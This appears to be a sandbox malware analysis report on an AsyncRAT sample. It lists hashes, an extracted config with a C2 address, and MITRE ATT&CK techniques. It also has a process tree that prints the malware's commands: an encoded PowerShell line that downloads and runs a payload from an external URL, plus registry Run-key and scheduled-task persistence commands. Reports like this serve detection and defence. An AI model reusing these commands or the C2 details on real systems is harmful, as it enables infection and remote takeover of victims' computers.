asyncrat | 11ec30aa3578d705303b3626615a9abdc9e876ccafdac76d1149680cb85d8e6d

General

Target

WindowShellExperince.exe
Size

6KB
MD5

c45730a39a78c6754c78471e820bff88
SHA1

725c3fd0a7afbacd85bb86535e00152d6cb4998d
SHA256

11ec30aa3578d705303b3626615a9abdc9e876ccafdac76d1149680cb85d8e6d
SHA512

35e5bfc810b76feddae33af90d3ee247c4148dd5e2076d7cb113859b9a45c5fdc6046bfe6305a9f2a908c9bff2db1a9e7062163703bba4d3217793289751c158
SSDEEP

96:1QP5v79dkCFmYKk0UqUMYl+8t/Os7RMkmqXld3ojrrl:+5T9dPFxMUqULk8t/OS28ldS

Score

10^/10

asyncrat system guard runtime persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4060-150-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

26 3852 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

82924msaurewkdf.exe

pid process

4852 82924msaurewkdf.exe

flow	pid	process
26	3852	powershell.exe

pid	process
4852	82924msaurewkdf.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WindowShellExperince.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WindowShellExperince.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

82924msaurewkdf.exe

description pid process target process

PID 4852 set thread context of 4060 4852 82924msaurewkdf.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4544 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3852 powershell.exe
3852 powershell.exe
3308 powershell.exe
3308 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3852 powershell.exe
Token: SeDebugPrivilege 3308 powershell.exe

description	pid	process	target process
PID 4852 set thread context of 4060	4852	82924msaurewkdf.exe	RegAsm.exe

pid	process
4544	schtasks.exe

pid	process
3852	powershell.exe
3852	powershell.exe
3308	powershell.exe
3308	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WindowShellExperince.exepowershell.exe82924msaurewkdf.execmd.exe

description	pid	process	target process
PID 2224 wrote to memory of 3852	2224	WindowShellExperince.exe	powershell.exe
PID 2224 wrote to memory of 3852	2224	WindowShellExperince.exe	powershell.exe
PID 3852 wrote to memory of 4852	3852	powershell.exe	82924msaurewkdf.exe
PID 3852 wrote to memory of 4852	3852	powershell.exe	82924msaurewkdf.exe
PID 3852 wrote to memory of 4852	3852	powershell.exe	82924msaurewkdf.exe
PID 4852 wrote to memory of 3308	4852	82924msaurewkdf.exe	powershell.exe
PID 4852 wrote to memory of 3308	4852	82924msaurewkdf.exe	powershell.exe
PID 4852 wrote to memory of 3308	4852	82924msaurewkdf.exe	powershell.exe
PID 4852 wrote to memory of 4380	4852	82924msaurewkdf.exe	cmd.exe
PID 4852 wrote to memory of 4380	4852	82924msaurewkdf.exe	cmd.exe
PID 4852 wrote to memory of 4380	4852	82924msaurewkdf.exe	cmd.exe
PID 4380 wrote to memory of 4544	4380	cmd.exe	schtasks.exe
PID 4380 wrote to memory of 4544	4380	cmd.exe	schtasks.exe
PID 4380 wrote to memory of 4544	4380	cmd.exe	schtasks.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe
PID 4852 wrote to memory of 4060	4852	82924msaurewkdf.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\WindowShellExperince.exe
"C:\Users\Admin\AppData\Local\Temp\WindowShellExperince.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAeABpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMwA5ADEAOAA5ADYANQAyADUANgA2ADkANwA4ADYANgAxAC8AMQAwADMAOQAyADEAMAA2ADIANQA3ADYAOAA4ADgAMgAyADUANwAvAEMAUgAuAGUAeABlACcALAAgADwAIwBhAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGcAeQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAYwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADgAMgA5ADIANABtAHMAYQB1AHIAZQB3AGsAZABmAC4AZQB4AGUAJwApACkAPAAjAGsAdwBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG4AagBnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAHgAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4ADIAOQAyADQAbQBzAGEAdQByAGUAdwBrAGQAZgAuAGUAeABlACcAKQA8ACMAdQBqAGQAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852

C:\Users\Admin\AppData\Roaming\82924msaurewkdf.exe
"C:\Users\Admin\AppData\Roaming\82924msaurewkdf.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
4⤵
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:4544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1ac91b5cbaee1716597f815b59fc04d6

SHA1
06a81b1c3f692d18b9b8a2ac396beef5db89da4f

SHA256
5eab192250ef11a9c0c8dcc67101290a7dd6c56eaca4f0c937a90e5dbd115ecb

SHA512
d8190b750758928bf0459237306cf175385c0c2f3d633ab2bffe1f4a3b5d90d59412d9ed57f45ffeb071b3a2fb601606c02432f4fcff9bdb3b0dd74dbb929ccb

Download Submit
C:\Users\Admin\AppData\Roaming\82924msaurewkdf.exe
Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\82924msaurewkdf.exe
Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
memory/2224-132-0x0000000000680000-0x0000000000688000-memory.dmp

Filesize
32KB

Download
memory/2224-134-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/2224-137-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/3308-159-0x00000000060B0000-0x00000000060CE000-memory.dmp

Filesize
120KB

Download
memory/3308-160-0x0000000007460000-0x0000000007ADA000-memory.dmp

Filesize
6.5MB

Download
memory/3308-167-0x0000000007170000-0x0000000007192000-memory.dmp

Filesize
136KB

Download
memory/3308-166-0x0000000007130000-0x0000000007138000-memory.dmp

Filesize
32KB

Download
memory/3308-165-0x0000000007150000-0x000000000716A000-memory.dmp

Filesize
104KB

Download
memory/3308-164-0x0000000007040000-0x000000000704E000-memory.dmp

Filesize
56KB

Download
memory/3308-163-0x0000000007090000-0x0000000007126000-memory.dmp

Filesize
600KB

Download
memory/3308-145-0x0000000000000000-mapping.dmp

Download
memory/3308-162-0x0000000006E80000-0x0000000006E8A000-memory.dmp

Filesize
40KB

Download
memory/3308-161-0x0000000006E10000-0x0000000006E2A000-memory.dmp

Filesize
104KB

Download
memory/3308-148-0x0000000002200000-0x0000000002236000-memory.dmp

Filesize
216KB

Download
memory/3308-158-0x0000000070C90000-0x0000000070CDC000-memory.dmp

Filesize
304KB

Download
memory/3308-157-0x0000000006AD0000-0x0000000006B02000-memory.dmp

Filesize
200KB

Download
memory/3308-151-0x0000000004C10000-0x0000000005238000-memory.dmp

Filesize
6.2MB

Download
memory/3308-152-0x0000000004B80000-0x0000000004BA2000-memory.dmp

Filesize
136KB

Download
memory/3308-153-0x0000000005470000-0x00000000054D6000-memory.dmp

Filesize
408KB

Download
memory/3308-154-0x00000000054E0000-0x0000000005546000-memory.dmp

Filesize
408KB

Download
memory/3308-156-0x0000000005B10000-0x0000000005B2E000-memory.dmp

Filesize
120KB

Download
memory/3852-135-0x000002EE457E0000-0x000002EE45802000-memory.dmp

Filesize
136KB

Download
memory/3852-133-0x0000000000000000-mapping.dmp

Download
memory/3852-142-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/3852-136-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/3852-138-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/4060-150-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4060-149-0x0000000000000000-mapping.dmp

Download
memory/4380-146-0x0000000000000000-mapping.dmp

Download
memory/4544-147-0x0000000000000000-mapping.dmp

Download
memory/4852-139-0x0000000000000000-mapping.dmp

Download
memory/4852-144-0x0000000005780000-0x0000000005D24000-memory.dmp

Filesize
5.6MB

Download
memory/4852-143-0x00000000008A0000-0x00000000008BC000-memory.dmp

Filesize
112KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads